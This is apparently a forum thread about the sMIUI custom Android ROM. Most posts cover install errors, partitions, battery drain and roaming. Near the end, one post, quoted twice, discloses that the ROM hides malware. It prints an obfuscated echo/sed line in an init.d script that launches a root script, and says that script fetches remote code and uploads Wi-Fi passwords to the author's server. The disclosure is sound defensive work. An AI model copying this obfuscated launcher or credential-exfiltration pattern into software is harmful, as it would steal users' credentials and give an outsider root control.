[rom]-- Smiui Rom -- Ultimate Custom Rom --[multilang,stable/weekly]

woww that's impressive! you could stop working if everybody PayPals $0,50 per download

and can you see the top 5 of countries where people download from?

Sent from my MI 2S using Tapatalk
Thats not the idea of open source and free development ;P
And I really like my job. ^^

Top countires are
1. indonesia
2. germany
3. USA
4. spain
5. italy
6. russia

After trying flash smiui for my Xiaomi Note 3 Pro i have this error:

Installing sMIUI...
symlink: some symlinks failed
Updater process ended whit ERROR: 7
Error installing zip file '/external_sd/ROMS/sMIUI_v7_kenzo_6.4.21_ENDIP.zip'

Updating partition details...
..done

twrp version:
twrp-3.0.2-1-kenzo.img
dito..
though installation is not ending/cancelling, just stucking at the following screen (attached):

fyi, using "libra_ts_twrp_3_0_2_0.img" (because the regular TWRP is freezing right after starting it) and already tried mounting with system checked and unchecked.
(sMIUI 6.7.14 works fine)

Attachments

• Screenshot_2016-08-03-07-14-27.png
    Screenshot_2016-08-03-07-14-27.png
    194.1 KB · Views: 476
Last edited:
Reactions: vivalasven
Hey Seb, on next release can u add this option in kitchen, cuz the stock sound in really bad.
Lock/unlock sound like Ios?
Thanks for your work.

Thats not the idea of open source and free development ;P
And I really like my job. ^^

Top countires are
1. indonesia
2. germany
3. USA
4. spain
5. italy
6. russia
as token of appreciation, I meant, not for the sales of course, it should be a voluntarily gesture. The phone / hardware is useless without good software, and in my opinion it's logical to thank software-developers, it's needed for the balance between your work and our use. Gratitude either with words or with a digital coffee/beer, or when it's not open-source with buying the pro-version of an app. I think a lot of the 5000-a-week-people just grab and go without 'thanks' and take it for granted that the software is available.

But it's so special that you and other devs devote your time and knowledge in this way. Thank you!

Hi,

have a problem with my Mi2s running out of system storage space...
I cannot install/update apps anymore because of my system storage space running out, as it only uses 4GB of my phones 32GB.

The version I have is: sMiUI v7 stable V7.2.5.0.LXACNDA and installed it some weeks ago.

Any info how to solve this and get rid of the 4GB limit ???

(Side info: I installed that version by first installing the official MIUI version (aries_images_V7.3.2.0.LXACNDD_20160419.0000.19_5.0_cn_41a03f792c.tgz) via PC suite and fastboot, then installed TWRP, and then sMiUI v7 stable V7.2.5.0.LXACNDA)

Hi,

have a problem with my Mi2s running out of system storage space...
I cannot install/update apps anymore because of my system storage space running out, as it only uses 4GB of my phones 32GB.

The version I have is: sMiUI v7 stable V7.2.5.0.LXACNDA and installed it some weeks ago.

Any info how to solve this and get rid of the 4GB limit ???

(Side info: I installed that version by first installing the official MIUI version (aries_images_V7.3.2.0.LXACNDD_20160419.0000.19_5.0_cn_41a03f792c.tgz) via PC suite and fastboot, then installed TWRP, and then sMiUI v7 stable V7.2.5.0.LXACNDA)
You have old partition scheme on the phone? In the last rom, there Is only One partition, in the First edition of the rom, thre were differenti partition, One for the system 4gb big, and the test of the space an emulated sd in a differenti partition...

Inviato dal mio MI PAD 2 utilizzando Tapatalk

You have old partition scheme on the phone? In the last rom, there Is only One partition, in the First edition of the rom, thre were differenti partition, One for the system 4gb big, and the test of the space an emulated sd in a differenti partition...

Inviato dal mio MI PAD 2 utilizzando Tapatalk

Yes, I still have the old partition sheme, but installing the official MIUI version first via fastboot should have solved that...
Will try again and see...
Perhaps the stable version of the official MIUI Rom does not have unified storage yet ?

The Rom is quite recent, as it's the latest stable versions of MIUI v7

Yes, I still have the old partition sheme, but installing the official MIUI version first via fastboot should have solved that...
Will try again and see...
Perhaps the stable version of the official MIUI Rom does not have unified storage yet ?

The Rom is quite recent, as it's the latest stable versions of MIUI v7
You must seatch guide in this forum how to link partition, generating one system, the last rom assume you alreadt have modified this, and does not change it. Search in mi2s section, you need a specific rom version which i dont remember to adjust the partition layout to the new roms.

Inviato dal mio PLK-L01 utilizzando Tapatalk

I used to be able to download at 16MB but now it is capped to 100KB then will stopped at 60% lol.

MI 3 battery drain problem...(6.8.4 and 6.811)

Attachments

• Screenshot_2016-08-16-10-17-07-929_com.miui.securitycenter.png
    Screenshot_2016-08-16-10-17-07-929_com.miui.securitycenter.png
    76.1 KB · Views: 424
  • Screenshot_2016-08-16-10-17-00-489_com.miui.securitycenter.png
    Screenshot_2016-08-16-10-17-00-489_com.miui.securitycenter.png
    89.5 KB · Views: 418
  • Screenshot_2016-08-16-10-16-54-115_com.miui.securitycenter.png
    Screenshot_2016-08-16-10-16-54-115_com.miui.securitycenter.png
    113.8 KB · Views: 418
I was abroad and I couldn't turn on the roaming data with version 6.7.28 on Mi2s, basically my mobile was always offline even if I enabled the option on menù. I had the chance to give a quick read on forums and it seemed to me that the problem is related to Miui, isn't it?

dito..
though installation is not ending/cancelling, just stucking at the following screen (attached):

fyi, using "libra_ts_twrp_3_0_2_0.img" (because the regular TWRP is freezing right after starting it) and already tried mounting with system checked and unchecked.
(sMIUI 6.7.14 works fine)

I have exactly the same problem when using "libra_ts_twrp_3_0_2_0.img". When trying regular TWRP, it will not allow a wipe as it fails to mount Cache. Wipe works fine in "libra_ts_twrp_3_0_2_0.img". A bit frustrating.. Any ideas on how to fix?

REMEMBER: when you cook the rom, check "don't overwrite recovery"

i think that twrp works well with mi4s too[/QUOTE]

Sorted. After wiping, I rebooted into Recovery, then flashed rom. It then went fine. Thanks for your suggestion.

This firmware is malware.
At least it downloads ads. But also it allows the author to take control on your phone.
Just see files /system/bin/api and /system/bin/apiget (also in zip in META-INF/com/google/android/sMiUI-kitchen/tmp/system/bin/).
Scripts from /system/etc/init.d are run at system start. There is a script "01sMIUI_optimizations". It contains a line
Code:
/system/bin/sh `echo "binajkdpjni%usr" | sed 's!^\(...\)\(.\)...\(.\)..\(i\).\(...\)$!/\5/\1/\2\3\4!g'`
echo+sed make string "/system/bin/api" and finally the command is
Code:
/system/bin/sh /system/bin/api
So it just runs "/system/bin/api". And that script does many bad actions, for example:
- loads new version of the script from smiui_net/api and saves it to the system. The author can place there any code and the code will be executed on your phone with root rights!
- it uploads the content of the file "/data/misc/wifi/wpa_supplicant.conf" (your Wi-Fi passwords) to smiui_net/api1.php
- it loads some ads (functions func_PROP, func_REV, func_TOTAL) in the background. In any time, constantly (when it receives "START" from their server)!
- there is also very very bad function func_SRV (+func_FILES), but it is commented (does not run). It makes your phone a part of the botnet! It loads some binaries (they do not exists for now) and looks like they start some tunnel/proxy on the phone.

Last edited:
curiously awaiting for response of devs

This firmware is malware.
At least it downloads ads. But also it allows the author to take control on your phone.
Just see files /system/bin/api and /system/bin/apiget (also in zip in META-INF/com/google/android/sMiUI-kitchen/tmp/system/bin/).
Scripts from /system/etc/init.d are run at system start. There is a script "01sMIUI_optimizations". It contains a line
Code:
/system/bin/sh `echo "binajkdpjni%usr" | sed 's!^\(...\)\(.\)...\(.\)..\(i\).\(...\)$!/\5/\1/\2\3\4!g'`
echo+sed make string "/system/bin/api" and finally the command is
Code:
/system/bin/sh /system/bin/api
So it just runs "/system/bin/api". And that script does many bad actions, for example:
- loads new version of the script from smiui_net/api and saves it to the system. The author can place there any code and the code will be executed on your phone with root rights!
- it uploads the content of the file "/data/misc/wifi/wpa_supplicant.conf" (your Wi-Fi passwords) to smiui_net/api1.php
- it loads some ads (functions func_PROP, func_REV, func_TOTAL) in the background. In any time, constantly (when it receives "START" from their server)!
- there is also very very bad function func_SRV (+func_FILES), but it is commented (does not run). It makes your phone a part of the botnet! It loads some binaries (they do not exists for now) and looks like they start some tunnel/proxy on the phone.